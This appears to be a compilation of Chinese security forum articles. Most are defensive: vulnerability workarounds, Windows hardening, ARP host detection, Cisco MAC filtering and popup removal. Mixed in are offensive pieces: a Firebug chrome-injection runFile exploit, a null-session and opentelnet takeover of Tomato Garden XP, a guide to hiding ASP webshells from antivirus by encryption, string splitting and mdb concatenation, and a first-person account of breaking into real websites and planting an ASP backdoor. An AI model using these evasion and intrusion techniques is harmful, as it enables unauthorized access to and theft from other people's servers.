Microsoft内容管理服务器没有充分地验证HTML重新定向查询中的输入,允许攻击者执行跨站脚本攻击,导致访问受影响系统上某一用户可访问的任意数据;此外攻击者还可以利用这个漏洞修改Web浏览器缓存和直接代理服务器缓存,并在这些缓存中放置欺骗内容。

建议临时解决方法

* 将MCMS站点设置为“是 - 只读”,禁止内容创作以及从站点管理器访问该MCMS服务器入口点

1. 依次单击“开始”、“程序”,选择“Microsoft内容管理服务器”。

2. 单击“服务器配置应用程序”。

3. 单击“Web”选项卡,然后选择“配置”。

4. 在您希望配置的MCMS网站的对话框中,选择“是 - 只读”。

5. 单击“确定”保存更改。

Firefox插件FireBug跨站脚本执行漏洞

作者:db19851217 来源:赛迪网技术社区

受影响系统

Parakey Inc. Firebug 1.02

Parakey Inc. Firebug 1.01

不受影响系统

Parakey Inc. Firebug 1.03

描述

BUGTRAQ ID: 23315

FireBug是一个非常实用的JavaScript以及DOM查看调试工具,是Firefox的一个插件。FireBug的对脚本代码的处理实现上存在漏洞,远程攻击者可能利用此漏洞在用户机器上执行恶意脚本代码。

在浏览器中远程脚本是受到沙盒限制的,也就是任何http:或https:前缀的URL都是安全的。浏览器扩展使用chrome: protocol,这个协议不受任何限制,因此浏览器扩展都是受信任的。如果远程脚本诱骗浏览器对chrome:执行JavaScript表达式的话,这个脚本就可以完全控制整个chrome及操作系统,因为命令执行和读写访问都是允许的。

如果要导致Firebug执行跨站脚本,可执行以下操作:

console.log({’ ’:’exploit’})

如果将这段JavaScript表达式嵌入到页面并使用安装了Firebug的浏览器打开,用户就会得到一个警告窗,这时攻击者可以向浏览器chrome中注入以下函数:

function runFile(f) {

var file = Components.classes["@mozilla.org/file/local;1"]

.createInstance(Components.interfaces.nsILocalFile);

file.initWithPath(f);

var process = Components.classes[

"@mozilla.org/process/util;1"]

.createInstance(Components.interfaces.nsIProcess);

process.init(file);

var argv = Array.prototype.slice.call(arguments, 1);

process.run(true, argv, argv.length);

}

runFile函数允许执行文件。通过浏览器chrome中的函数声明,攻击者就可以多次调用console.log以生成任意文件,甚至暗中安装浏览器扩展,以及读写文件。

三种方法解决IIS 6 目录检查安全漏洞

作者:db19851217 来源:赛迪网技术社区

一 、 Windows 2003 Enterprise Edition IIS6 目录检查漏洞的描述

1、Windows 2003 Enterprise Edition是微软目前主流的服务器操作系统。 Windows 2003 IIS6 存在着文件解析路径的漏洞,当文件夹名为类似hack.ASP的时候(即文件夹名看起来像一个ASP文件的文件名),此时此文件夹下的任何类型的文件都可以在IIS中被当做ASP程序来执行。这样黑客即可上传扩展名为.jpg或.gif之类的看起来像是图片文件的木马文件,通过访问这个文件即可运行木马。

2、 扩展名为.jpg/.gif的木马检查方法:

在资源管理器中使用详细资料方式,按类别查看。点“查看”菜单--“选择详细信息”--勾选上“尺寸”,确定。此时,正常的图片文件会显示出图片的尺寸大小,如果没有显示,则99%可以肯定是木马文件。用记事本程序打开即可100%确定.

3、 漏洞影响的范围:

安装了IIS6的服务器(windows2003),漏洞特征网站的管理权限被盗、导致网站被黑。因为微软尚未发布这个漏洞的补丁,所以几乎所有网站都会存在这个漏洞。

二、如何解决IIS6安全漏洞?

A 方案 :打补丁

本来安装补丁是一种比较保险的方法,可是漏洞已发现一段时间了,微软一直没有发布相关的补丁。

B方案:网站程序员解决

对于那些允许注册帐号的网站来说,在网站程序编写的时候,程序员通常为了管理方便,便以注册的用户名为名称来建立一个文件夹,用以保存该用户的数据。例如一些图片、文字等等信息。黑客们就是利用了这一特点,特意通过网站注册一个以.或者.cer的后续名作注册名,然后通过如把含有木马的ASP文件的.asp后缀改成.jpg等方法,把文件上传到服务器,由于IIS6漏洞,jpg文件可以通过IIS6来运行,木马也随着运行,达到了攻击网站的目的,这种情况,可以由程序员对注册用户名称进行限制,排除一些带有*.asp *.asa等字符为名的注册名。加强网站自身的安全和防范措施。另外,要阻止用户对文件夹进行重命名操作。

这种方法在一定程度上可以防范一些攻击行为,但是这种方法实现起来非常麻烦,网站的开发人员在程序安全性方面必须掌握相当好的技术,并且必须要对整个网站涉及文件管理方面的程序进行检查,一个网站少则几十,多则上千个文件,要查完相当费时,并且难免会漏掉其中一两个。

另外,目前有很多现成的网站系统只要下载后上传到空间就可以用,开发这些现有网站系统的程序员技术水平参差不齐,难免其中一些系统会存在这种漏洞,还有相当一部分系统的源码是加密过的,很多站长想改也改不动,面对漏洞无乎无能为力。

C方案:服务器配置解决

网站管理员可以通过修改服务器的配置来实现对这个漏洞的预防。如何对服务器进行配置呢?很多网站都允许用户上传一定数量的图片、Flash等,很多时候网站开发人员为了日后管理方便,对上传的文件都统一放到指定的一个文件夹里面,管理员只要对该文件夹的执行权限设置成“无”,这样一定程度可以对漏洞进行预防。

D方案: 服务商解决 服务器商对服务器进行统一的整体性过滤,通过编写组件来限制这种行为。但是能做到这种技术服务的主机供应服务商不多。

主动出击 用SREng提前查出系统隐患

主动出击 用SREng提前查出系统隐患

SREng功能简介

System Repair Engineer(以下简称SREng)是一款非常好用的系统诊断配置工作,主要用于发现、发掘潜在的计算机故障和大多数由于计算机病毒造成的破坏,软件的前身是RegFix(一款注册表键值修复工具),由KZTechs.COM网站站长Smallfrogs开发。

System Repair Engineer下载

软件在以往版本的基础上,除了增加了对x64操作系统的支持外,重点增强了危险性检测和扩展功能,提供了一套全新的系统扫描、配置功能,并提供了对第三方插件的支持,将下载回来的压缩包释放后即可使用。

1.提高64位系统的安全保障

这个版本已经能够很好的检查Windows XP Professional x64操作系统上可能存在的问题,而专用的x64版本的SREng将很快发布。有了这一支持,对于已经在使用64位操作系统的朋友来说,就比较方便了。

2.精确智能扫描

这个版本的智能扫描功能与以前版本相比,有了进一步的提示,主要是增加了识别的精确度。切换到“智能扫描”标签页,单击右下角的“扫描”按钮,SREng会对所有启动项目、浏览器加载项、正在运行的进程、文件关联、Winsock提供者等内容进行完整的扫描,扫描完成后会生成一份详细的报告,在这个报告的帮助下,我们可以发现一些系统中存在的错误并得到相应的提示。

3.红色警报和蓝色提醒

软件版本增加了启动项、服务危险性的判断规则,当发现一个项目具有可疑特征时,可以将可疑项目自动高亮显示出来。对于可疑项目的判定结果分成两种:高危程序和未知安全等级程序,对于前者会以红色显示出来,后者则显示为蓝色,该规则首先在注册表启动项、Win32服务、驱动程序中使用。

这里需要说明的是,如果蓝色出现在驱动程序列表中,这种情况是正常的,一般情况下无需担心。

4.修复系统

在系统修复方面,SREng提供了强大而丰富的功能,这里笔者简单介绍一下相关的修复功能:

文件关联:如果默认的文件关联出现错误,可以在这里进行快速修复。

Windows Shell:这里主要是关于Windows外壳程序的修复,包括资源管理器等,例如让“运行”对话框允许运行、允许使用注册表编辑器、允许使用控制面板等。Internet Exploere:可以对受到非法篡改的IE进行修复。

浏览器加载项:修复的对象包括BHO、工具栏、ActiveX、右键菜单等,特别是对于由于安装第三方软件而自动进入浏览器的加载项,可以在这里选中后直接删除,而不用再进入注册表手工修改键值。

HOSTS文件:可以在这里新建或删除需要屏蔽的站点。

Winsock供应者:可以删除不需要的内容

当然,如果你比较懒惰的话,干脆切换到“自动修复”标签页,这里提供了推荐修复、高强修复两种级别,建议选择推荐修复级别,这样比较保险,单击“修复”按钮,确认后可以自动修复所有已经的注册表错误。

小提示

SREng支持参数功能,“/auto”可以对系统进行自动修复,如果你不希望修复完成后弹出提示信息,可以使用“/auto /s”参数以执行静默修复。

我有“金钟罩”个人电脑安全防护秘技

由于现在家用电脑所使用的操作系统多数为Windows XP和Windows 2000 Pro(建议还在使用98的朋友换换系统,连微软都放弃了的系统你还用它干嘛?)所以后面我将主要讲一下基于这两个操作系统的安全防范。

个人电脑常见的被入侵方式

谈到个人上网时的安全,还是先把大家可能会遇到的问题归个类吧。我们遇到的入侵方式大概包括了以下几种:

(1) 被他人盗取密码

(2) 系统被木马攻击

(3) 浏览网页时被恶意的Java Scrpit程序攻击

(4) QQ被攻击或泄漏信息

(5) 病毒感染

(6) 系统存在漏洞使他人攻击自己

(7) 黑客的恶意攻击

下面我们就来看看通过什么样的手段来更有效的防范攻击

1、察看本地共享资源

运行CMD输入Net Share,如果看到有异常的共享,那么应该关闭。但是有时你关闭共享下次开机的时候又出现了,那么你应该考虑一下,你的机器是否已经被黑客所控制了,或者中了病毒。

2、删除共享(每次输入一个)

net share admin$ /delete

net share c$ /delete

net share d$ /delete(如果有e,f,……可以继续删除)

3、删除IPC$空连接

在运行内输入regedit,在注册表中找到 HKEY-LOCAL_MACHINESYSTEMCurrentControSetControlLSA 项里数值名称RestrictAnonymous的数值数据由0改为1。

4、关闭自己的139端口,IPC和RPC漏洞存在于此

关闭139端口的方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WinS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关闭了139端口。

5、防止rpc漏洞

打开管理工具——服务——找到RPC(Remote Procedure Call (RPC) Locator)服务——将故障恢复中的第一次失败,第二次失败,后续失败,都设置为不操作。

6、445端口的关闭

修改注册表,添加一个键值

HKEY_LOCAL_MACHINESystemCurrentControlSetServicesNetBTParameters

在右面的窗口建立一个SMBDeviceEnabled 为REG_DWORD类型键值为0这样就ok了

7、3389的关闭

Windows XP:我的电脑上点右键选属性--> 远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。

Windows2000 server 开始--> 程序--> 管理工具--> 服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。(该方法在XP同样适用)

使用Windows2000 Pro的朋友注意,网络上有很多文章说在Windows2000 Pro 开始--> 设置--> 控制面板--> 管理工具--> 服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务,可以关闭3389,其实在Windows2000 Pro 中根本不存在Terminal Services。

番茄花园版Windows XP系统安全性分析

作者:db19851217 来源:赛迪网技术社区

番茄花园版Windows XP的漏洞发现及分析和预防

此次分析的版本是《番茄花园 Windows XP Pro SP2 免激活 V 2.8》和《番茄花园 Windows XP Pro SP2 免激活 V2.9》及《番茄花园 Windows XP Pro SP2 免激活 V 2.7》,其他版本不详。

使用net use命令和用户名Administrator建立空连接(没有密码,却可以成功连接),然后用at命令计划任务关闭Windows Firewall/Internet Connection Sharing (ICS)服务(为了关闭Windows防火墙),然后用opentelnet开启对方的telnet,至此,得到Administrator权限的 shell。然后在telnet下运行net share C$=C:开启对方c盘的默认共享,然后用copy命令把对方%systemroot%system32下的oemlogo。bmp和0minfo。ini复制到本地磁盘,打开oemlogo.bmp发现正是番茄花园v2.8版。

第一时间想到的就是原来的系统默认设置遭到了修改。于是打开注册表查看limitblankpassworduse的值,果然是0;这个键值的默认值本来是1,而被人为修改为0。使用番茄花园版v2.8或者v2.9的朋友,可以打开注册表编辑器regedit,查看项 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa下的键值 limitblankpassworduse,看键值是否为0;然后安装一次原版XP SP2,看这个键值;对比一下便知。最后又下载了V2.7测试,2.7没有发现类似安全漏洞。

东海的电脑公司版的问题分析

对东海的电脑公司版4.x系列和5.x系列的分析

东海的电脑公司版的安全性问题,一直为大家所诟病。其中大有讨伐者,也大有拥护崇拜者。而其中讨伐者,论点就是空密码的New帐户,还有远程桌面的开启。其中拥护崇拜者,论点就是安全性问题是使用者没有设置密码造成的等等。

安全问题包括很多方面,一是系统的本身的策略设置是否足够安全,能否正常阻止非法访问;二是病毒木马问题,这个问题嘛,矛和盾的问题,最主要还是要有良好的上网习惯。

微软的实力是不容置疑的,微软对于自己的系统的设置也当然比外人,比民间更清楚,也更清楚每一个设置的每一个细节问题。对于XP SP2,安全完毕后,其实只要第一时间升级所有安全补丁,即可保证安全。

微软对于自己的系统的了解程度肯定比外人更了解。系统优化是不具备通用性的,优化都是针对个人的使用习惯、嗜好、需求等等

利用ARP探测以太网中的活动主机

利用ARP探测以太网中的活动主机



网上存在很多关于ARP的文章,大多都是关于ARP欺骗,这里介绍ARP的另类用法:探测目标主机是否处于活动状态。
传统探测远程主机是否存活的方法是通过ICMP协议中的回显应答报文来探测(ping)。随着对安全的越来越多的了解和重视,很多主机为了避免被扫描器探测,通过防火墙将ICMP包屏蔽,从而达到在网络中隐藏的目的。
这里我们介绍一下利用ARP协议探测网络中的活动主机的思路,这种方法的缺点只能探测以太网内的活动主机。
先大概了解一下ARP协议。ARP协议是“Address Resolution Protocol”(地址解析协议)的缩写,它的作用是将IP地址转换成物理地址(就是常说的MAC地址),其详细过程参考《TCP/IP详解 卷一》。协议ARP的分组格式如下:
------------------------------------------
以太网目的地址(6个字节)
以太网源地址(6个字节)
帧类型(ARP = 0806)(2个字节)
------------------------------------------
硬件类型(Ethernet=01)(2个字节)
协议类型(IPv4=0800)(2个字节)
硬件地址长度(1个字节)
协议地址长度(1个字节)
OP操作选项(ARP request=01,ARP reply=02)(2个字节)
发送端以太网地址(6个字节)
发送端IP地址(4个字节)
目的以太网地址(6个字节)
目的IP地址(4个字节)
--------------------------------------------

我们向目标主机发送一个ARP请求,如果目标主机处于活动状态则会返回其MAC地址,如果对方返回MAC地址,则表明对方处于活动状态,这样达到探测目的。ARP请求包内容如下:
------------------------------------------
以太网目的地址 |FFFFFFFFFFFF(广播地址)
以太网源地址 |本地MAC地址
帧类型 |0806
------------------------------------------
硬件类型 |01
协议类型 |0800
硬件地址长度 |06
协议地址长度 |04
OP操作选项 |01
发送端以太网地址|本地MAC地址
发送端IP地址 |目标主机IP地址
目的以太网地址 |000000000000
目的IP地址 |目标主机IP地址
--------------------------------------------
注意:这里以太网目的地址为FFFFFFFFFFFF,这是广播地址,以太网上所有主机都能收到这个包,在收到这个数据包后,操作系统判断目的IP地址是不是这台主机,如果不是则丢弃(不作处理),否则发送回一个ARP应答包,包的内容如下:
------------------------------------------
以太网目的地址 |探测主机的MAC地址
以太网源地址 |本地MAC地址 (这里本地指被探测主机)
帧类型 |0806
------------------------------------------
硬件类型 |01
协议类型 |0800
硬件地址长度 |06
协议地址长度 |04
OP操作选项 |02
发送端以太网地址|本地MAC地址 (这里本地指被探测主机)
发送端IP地址 |本机IP地址 (这里本地指被探测主机)
目的以太网地址 |探测主机的MAC地址
目的IP地址 |探测主机的IP地址
--------------------------------------------

我们可以使用Pcap自己来构造这个数据包(具体过程参考Pcap的相关文档,这里我们使用SendARP()来实现),SendARP()是Microsoft Platform SDK中提供用来获得目标主机的MAC地址的函数,SendARPSendARP的函数原型如下:
DWORD SendARP(
IPAddr DestIP, // 目标IP地址
IPAddr SrcIP, // 源IP地址
PULONG pMacAddr, // 返回MAC地址指针
PULONG PhyAddrLen // 返回MAC地址长度
);


下面这个例子摘至MSND,稍做改动可以成为一个以太网内活动主机探测工具
//
// Link with ws2_32.lib and iphlpapi.lib
//

#include
#include
#include
#include


int __cdecl main()
{
HRESULT hr;
IPAddr ipAddr;
ULONG pulMac[2];
ULONG ulLen;

ipAddr = inet_addr ("192.168.0.1");
memset (pulMac, 0xff, sizeof (pulMac));
ulLen = 6;

hr = SendARP (ipAddr, 0, pulMac, &ulLen);
printf ("Return %08x, length %8d\n", hr, ulLen);

size_t i, j;
char * szMac = new char[ulLen*3];
PBYTE pbHexMac = (PBYTE) pulMac;

//
// Convert the binary MAC address into human-readable
//
for (i = 0, j = 0; i < ulLen - 1; ++i) {
j += sprintf (szMac + j, "%02X:", pbHexMac);
}

sprintf (szMac + j, "%02X", pbHexMac);
printf ("MAC address %s\n", szMac);

delete [] szMac;

return 0;
}


ARP欺骗木马程序入侵电脑系统破坏严重

作者:hanbin 来源:华夏收集

国家计算机病毒应急处理中心通过对互联网监测发现,近期一些局域网中的计算机系统受到一种“地址解析协议欺骗”(简称ARP欺骗)的恶意木马程序的入侵破坏,严重影响了局域网中用户计算机系统的正常运行。

专家说,如果进行“ARP欺骗”的恶意木马程序入侵某个局域网中的计算机系统,那么该系统就会试图通过“ARP欺骗”手段截获所在局域网络内其他计算机系统的通信信息,导致该局域网出现突然掉线,过一段时间后又会恢复正常的现象。同时,网内的其他计算机系统也会受到影响,出现IP地址冲突、频繁断网、IE浏览器频繁出错以及系统内一些常用软件出现故障等问题。

专家提醒,由于进行“ARP欺骗”的恶意木马程序的危害性比较大,特别是对各类校园网、小区网、企业网以及网吧等局域网都会有不同程度的破坏行为,最终可能导致局域网的瘫痪。因此,在局域网中的每一个计算机用户要提高警惕,做好防范工作,杜绝此类现象的发生。

专家建议,用户要及时给计算机系统安装系统漏洞补丁程序,并经常升级计算机系统中防毒软件和防火墙。还可以在局域网中安装并使用网络防火墙软件,网络防火墙能有效地阻挡来自网络的攻击和病毒的入侵。另外,用户不要随意点击打开QQ、MSN等聊天工具上发来的地址链接或是其他数据信息,更不要随意打开或运行陌生、可疑的文件和程序,将局域网系统管理员账户的密码的位数设置复杂一点。同时要关闭一些不需要的网络服务,也可以关闭一些没有必要的网络共享。

实例介绍以太网MAC地址的获取更改应用

作者:赵长林 来源:赛迪网

以太网MAC地址唯一地标识了世界上的每个以太网设备。每一个生产网络设备的厂商都要将MAC地址预先写进其设备中(如:以太网网卡,路由器,交换机等)。各种媒体已有很多文章介绍获得MAC地址的方法。今天我们主要讨论怎样在Cisco的IOS获得、改变MAC地址,并使用MAC地址进行网络通信过滤。

获得MAC地址

在交换机的命令输入窗口,输入“show mac-address-table”可以获得MAC地址表,例如:

Switch# show mac-address-table

Mac Address Table

-------------------------------------------

Vlan Mac Address Type Ports

---- ----------- -------- -----

All 0014.1c40.b080 STATIC CPU

All 0100.0ccc.cccc STATIC CPU

All 0100.0ccc.cccd STATIC CPU

All 0100.0cdd.dddd STATIC CPU

1 000f.1fd3.d85a DYNAMIC Fa0/14

在思科路由器上,可以使用“show interfaces”来查看MAC地址。例如:

RouterB# show interfaces

Ethernet0/0 is up, line protocol is up

Hardware is AmdP2, address is 0003.e39b.9220 (bia 0003.e39b.9220)

Internet address is 1.1.1.1/8

在第二行,可以看到:“bia 0003.e39b.9220”,bia即“烧录地址”(burned in address),MAC地址即0003.e39b.9220。

改变MAC地址

改变MAC地址实质上其否定含义就是MAC欺骗。特别是对于无线网络的攻击,改变MAC地址是常用的方法。改变MAC地址也可以用于合法的用途,如测试MAC过滤。

要改变设备在路由器上的MAC地址,需在Interface Configuration Mode(界面配置模式)下,使用“mac –地址”命令。例如:

RouterB# conf t

Enter configuration commands, one per line. End with CNTL/Z.

RouterB(config)# int e0/0

RouterB(config-if)# mac-address 0000.0000.0001

RouterB(config-if)#^Z

RouterB#

RouterB# show int e0/0

Ethernet0/0 is up, line protocol is up

Hardware is AmdP2, address is 0000.0000.0001 (bia 0003.e39b.9220)

Internet address is 1.1.1.1/8

在改变MAC地址以后,可以使用show interface命令来查看新的地址。

基于MAC地址的通信过滤

通过协议分析仪,可以发现一些网络中某些设备非正常的数据通信。例如,某设备通过多个IP地址发送数据包。

这种情况,可以使用show mac-address-table命令来查看它所使用的交换机端口,并可以关闭此端口。但是,如果此端口连接的是一个集线器,而集线器又连接了许多其它设备那该怎么办呢?

有一个方法便是使用MAC地址过滤来对路由器或交换机的数据通信进行过滤。下面是一个例子:

Cat3750Switch(config)# mac access-list ext filtermac

Cat3750Switch(config-ext-macl)# deny host 0000.0000.0001 any

Cat3750Switch(config-ext-macl)# permit any any

Cat3750Switch(config-ext-macl)# exit

Cat3750Switch(config)# int g1/0/40

Cat3750Switch(config-if)# mac access-group filtermac in

此命令在Cisco Catalyst 3750 Gigabit Ethernet switch交换机上完成。我们创建了一个名为“filtermac”的ACL(访问控制表)。这个ACL拒绝了与源地址为0000.0000.0001(十六进制非二进制)的所有数据通信,但是却允许其它地址的数据通信。将这个ACL运用到界面1/0/40,这就防止了拥有这个MAC地址的设备与本端口的数据通信,而不管它的IP地址是什么。

但是,不管怎么说,MAC地址过滤并非安全措施,因为他人可以轻易地改变MAC地址。

轻易绕过 PW论坛程序高危漏洞攻防详解

无法查看这则摘要。请 点击此处查看博文。

ASP网站漏洞解析及黑客入侵防范方法

ASP网站漏洞解析及黑客入侵防范方法

作者:黑客基地 来源:黑客基地

如何更好的达到防范黑客攻击,本人提一下个人意见!第一,免费程序不要真的就免费用,既然你可以共享原码,那么攻击者一样可以分析代码。如果在细节上注意防范,那样你站点的安全性就大大的提高了。即使出现了SQL Injection这样的漏洞,攻击者也不可能马上拿下你的站点。由于ASP的方便易用,越来越多的网站后台程序都使用ASP脚本语言。但是,由于ASP本身存在一些安全漏洞,稍不小心就会给黑客提供可乘之机。事实上,安全不仅是网管的事,编程人员也必须在某些安全细节上注意,养成良好的安全习惯,否则会给自己的网站带来巨大的安全隐患。目前,大多数网站上的ASP程序有这样那样的安全漏洞,但如果编写程序的时候注意一点的话,还是可以避免的。

1、用户名与口令被破解

攻击原理:用户名与口令,往往是黑客们最感兴趣的东西,如果被通过某种方式看到源代码,后果是严重的。

防范技巧:涉及用户名与口令的程序最好封装在服务器端,尽量少在ASP文件里出现,涉及与数据库连接的用户名与口令应给予最小的权限。出现次数多的用户名与口令可以写在一个位置比较隐蔽的包含文件中。如果涉及与数据库连接,在理想状态下只给它以执行存储过程的权限,千万不要直接给予该用户修改、插入、删除记录的权限。

2、验证被绕过

攻击原理:现在需要经过验证的ASP程序大多是在页面头部加一个判断语句,但这还不够,有可能被黑客绕过验证直接进入。

防范技巧:需要经过验证的ASP页面,可跟踪上一个页面的文件名,只有从上一页面转进来的会话才能读取这个页面。

3、Inc文件泄露问题

攻击原理:当存在ASP的主页正在制作且没有进行最后调试完成以前,可以被某些搜索引擎机动追加为搜索对象。如果这时候有人利用搜索引擎对这些网页进行查找,会得到有关文件的定位,并能在浏览器中查看到数据库地点和结构的细节,并以此揭示完整的源代码。

防范技巧:程序员应该在网页发布前对它进行彻底的调试;安全专家则需要加固ASP文件以便外部的用户不能看到它们。首先对.inc文件内容进行加密,其次也可以使用.asp文件代替.inc文件使用户无法从浏览器直接观看文件的源代码。Inc文件的文件名不要使用系统默认的或者有特殊含义容易被用户猜测到的名称,尽量使用无规则的英文字母。

不死传说之 打造不死的ASP木马的方法

作者:黑色记忆 来源:《黑客X档案》

想不到,前几天我才发现,我千辛万苦收集的ASP木马,居然没有几个不被Kill的。常说养马千日用马一时,可要是连马都养不好,用的时候可就头疼了。众多杀软中,查杀效果比较好厉害的就是瑞星跟NOD32(测试软件:瑞星2006、卡巴斯基反病毒6.0、Kv2006、 NOD32 AntiVirusv2.51.30和McAfee VirusScan v8.0i)。

来看一下几种比较常见的ASP木马免杀方法

1.加密法

常用的是用微软的源码加密工具screnc.exe,以此来躲开杀毒软件的追杀。优点是见效明显,一般的有害代码用此法加密后,可以存在于服务器上,发挥原有的功能.缺点是代码经过加密后,是不可识别字符,自己也不认识了。

2.大小写转换法

把被杀程序里的代码,大小写稍作转换.可以躲过一般的杀毒软件。(WORD可以转换大小写,这招对ASPX木马免杀很管用)。

3.混水摸鱼法

这种方法也常奏效.fso写成"f"&vbs&"s"&vbs&"o",运行的结果是一样的,但文件却可以逃过杀毒软件的查杀。

4.图片法或组合法

把代码保存为*.jpg,引用,这样,也可以躲过一劫.把很多个代码分配到1.ASP,2.ASP,3.ASP...中,再通过#include合并起来,可逃过and条件的杀毒软件。

5.移位,逆位,添零法

这种方法也属于加密,可以用黑客伟跟冰狐的作品。

6.ASP结构特征法

在程序开头跟结尾加上图片数据库之类的特征码,改变本身结构。无论是删除一些特征,还是颠倒顺序只要能正常使用即可。

以前用screnc.exe加密都被杀了,其实网上好多加密软件都是利用这个小东西加密的。看来这种方法现在是行不通了。现在比较流行的就是移位、逆位、添零等。有能力的朋友可以定位下杀毒软件的特征码或者自己编写修改。有时候把里边的东西文字改改换换位置跟语法也能躲过查杀。

其实我感觉破坏ASP的结构性是最好的免杀方法。也看了许多文章,其中有在ASP开头加入图片特征码躲过查杀,不过这种方法有的时候是没用的,于是便想起了可以改变成数据库结构。这种工具网上也有的,不过是用来欺骗动网后台备份的。

我以原版海阳顶端木马为例,首先把ASP木马合并成数据库(copy X.mdb+X.ASP X.ASP),使用杀毒软件查杀,可以躲过瑞星2006、卡巴斯基反病毒6.0、Kv2006、McAfee。唯独不能躲过NOD32查杀。这时候可以先用screnc.exe加密下在合并,这样NOD32(图1)也检测不出来了。最重要的是能正常使用图2?答案是可以的。



图1



图2

这一系列的操作很是烦琐,所以我写了个小程序来简化操作。就是把未加密的ASP木马改名为A.ASP,然后运行MSASP.EXE程序就可以了。最后这几种免杀的方法结合起来使用效果非常不错,大家可以亲自试验一番。



图3



图4

专家教你利用思易ASP木马追捕入侵站点

作者:db19851217 来源:赛迪网技术社区

朋友的网站近日多次被黑,而且老是被改页面,让我帮忙看看问题到底出在哪里。于是我找出早就听说可以找木马的思易ASP木马追捕,传到网站上查ASP木马。果然好用,它能列出网站内的所有目录和文件,凡ASP网页中调用FSO,有写(删、建)和上传功能的,它都能给找出来,而且它比其它ASP木马追捕更好的是能查关键字,我用它找出了朋友没有查出的冰狐后门。不过,这个用于网站安全维护的辅助工具,居然没有密码认证。有些粗心的管理员可能在用过后不会想到删除,或者为了以后再用,很可能将它放在网站上——我决定搜搜看。

在百度上用网页中的提示字查找,关键字是“思易ASP木马追捕”,找到相关网页约1,260个,从有这些关键字所在文件的扩展名看,大部分是提供下这个文件载,只有少数是思易这个ASP文件。

换用“本程序由Blueeyes编写”,找到17条记录,除3条是相关代码介绍外,其它都是思易ASP追捕这个文件本身,也就是说都可利用。看来命中率还是蛮高的。

小提示:比较了两次不同的搜索结果,可以发安闲有些站点在前面曾经搜到过,而这里没有,说明网上放有这个文件的网站远不止这些,变换搜索关键字,应该可以找出更多。

好了,我们来试着入侵这些网站。真接点击查询到的网页就可以打开思易ASP木马追捕了。我随便点了一个地址,这好象是个虚拟主机,我正想要虚拟主机的代理程序呢,就选它了。

通过网站内的思易ASP木马追捕文件,网站的目录、文件全部出来了。这个思易只能看,动手下载或打开文件却不行,怎么办呢?当然是找数据库了。要是能下载,密码又是明文,哼,那就好玩了!找到数据库目录,看到数据库是ASP,试试能不能下载,可惜人家做了防下载处理,下载不了——不过角落里有一个是mdb的数据库,估计是备份用的,也许里面也有密码信息,下载了再说。下载后,打开发现居然需要密码。

只好拿出破密码的软件破密码,找开后发现有密码信息。然后再根据思易找到后台,看能不能用“'or''='”进入,不行;找上传文件看有没有漏洞,结果论坛是不常见的,根本就没有上传文件;看来虚拟主机不是那么好拿的。

无奈中在思易ASP上点选“回上级目录”点点看,天啦,天上掉陷饼啦?居然可以回到根目录,看到其它的网站,看来是管理员没有设置访问的权限,有戏哦!如图6所示。

到各个目录下看看,进入一个FTP下载目录,有不少电影,先放一边。转了几个目录,下载了些不知名的工具,还下载了一个Web.rar文件,打看一看正是这个网站系统。这个在网站上可看不到,终于让我下到了,有点收获!

继续找可以入侵的地方,转到另一个可以访问的网站,看看数据库,扩展名是MDB,下载后顺利打开,密码还是明文的,成功了一半了。马上登陆后台,用得到的用户和密码顺利进入。有添加软件栏,但有点让人失望,只能填地址,不能直接上传,文章也没有上传图片功能。倒是有一个图片栏,可以上传图片。

既然是专门的图片栏,估计对上传类型做了严格的过滤,只能试试有没有上传漏洞可用了。用老兵的上传工具测试,结果不成功,扩展名改成了JPG。果然厉害,把漏洞补了?!

只能看着电脑发呆了,决定抓个包看看,直接在网站中把ASP当图片上传,提示文件类型非法,这也在意料之中。不等我看抓包结果,眼前的景象让我不敢相信:图片地址栏中出现了一组数字,后面是ASP!

真的不敢相信,不是我自己把在先前的文件地址复制到这里,改成ASP的吧?回忆一下,没有这样做,再看看,与先前上传的文件名不同。怎么回事,试试吧。天!奇迹真的出现了,ASP执行了!

后来进去后看了一下代码,前台没有任何过滤,后台只过滤了ASP,而且由于代码错误,它只是警告,并没有停止执行,文件继续上传了。

脚本小子:相关代码如下:

fileExt=lcase(right(file.filename,3))

if fileExt="asp" then

Response.Write"文件类型非法"

end if

end if

randomize

ranNum=int(90000*rnd)+10000

所以它实际上可以上传任何文件,警告提示只是吓唬人。

有了这个ASP后门,其它的就好办了。上传一个控制后门,果然很容易就进入了先前的目标网站。打开Coon.asp,数据库的密码出来了,通过后门程序将正在用的扩展名为ASP的数据库下载,改成MDB的,用密码打开,管理员的密码又是明文。用管理员姓名和密码,终于进入了目标网站后台。这次入侵可以说没有用上黑客工具,也没有多少技术可言,但入侵的思路与方法还是很独特的。有几个地方还是能给大家启发的,把网站的安全工具变成找肉鸡的工具,在直接不行时迂回作战,最后达成目的。可以说,黑客不仅仅是技术,有时思路也是很重要的。此外,这次入侵过程也显示,网站管理软件是一把双刃剑,因此必须采取必要的安全措施,要么加上密码认证,要么用时上传,用后删除。

弹出网页或不定时弹出网页的解决办法

弹出网页或不定时弹出网页的解决办法

作者:hanbin 来源:赛迪网技术社区

启动时弹出对话框

1.系统启动时弹出对话框,通常是一些广告信息,例如欢迎访问某某网站等。

2.开机弹出网页,通常会弹出很多窗口,让你措手不及,恶毒一点的,可以重复弹出窗口直到死机。

解决办法:弹出对话框,打开注册表编辑器,找到

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon

主键,然后在右边窗口中找到"LegalNoticeCaption"和"LegalNoticeText"这两个字符串,删除这两个字符串就可以解决在启动时出现提示框的现象了。

弹出网页

解决办法:点击"开始-运行-输入msconfig",选择"启动",把里面后缀为url、html、htm的网址文件都勾掉。

IE窗口定时弹出

中招者的机器每隔一段时间就弹出IE窗口,地址指向网络注氓的个人主页。不晓得是不是网络流氓以为这样你就会经常光顾?

解决办法:点击"开始-运行-输入msconfig",选择"启动",把里面后缀为hta的都勾掉,重启。

突然弹出很多IE窗口

具体操作方法如下:

1.弹出了一大堆IE窗口,而且还是不停地继续弹出,鼠标点击"X"的速度远比不上它

2.这时候不要急,按Ctrl+Alt+Delete叫出任务管理器

